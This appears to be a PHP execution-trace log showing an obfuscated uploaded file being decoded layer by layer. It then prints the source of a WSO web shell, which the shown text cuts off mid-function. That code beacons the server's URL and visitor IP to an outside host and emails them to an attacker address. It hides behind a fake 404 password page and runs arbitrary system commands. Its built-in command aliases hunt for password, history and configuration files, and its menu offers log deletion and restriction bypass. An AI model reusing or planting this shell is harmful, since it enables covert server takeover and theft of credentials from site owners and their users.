3 8 R 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 0 0.000675 461344 base64_decode 0 /var/www/html/uploads/wso1.php(4) : eval()'d code 1 1 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 1 0.000791 494144
3 9 R '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 0 0.001238 461344 gzinflate 0 /var/www/html/uploads/wso1.php(4) : eval()'d code 1 1 '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 1 0.001687 485952
3 10 R 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3 11 0 0.002133 453152 gzuncompress 0 /var/www/html/uploads/wso1.php(4) : eval()'d code 1 1 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3 11 1 0.002902 539200
3 11 R '<?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3 12 0 0.005572 1143752 eval 1 '?><?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n if($gitt == false){\r\n @$gitt = file_get_contents($x);\r\n }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' ©\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security 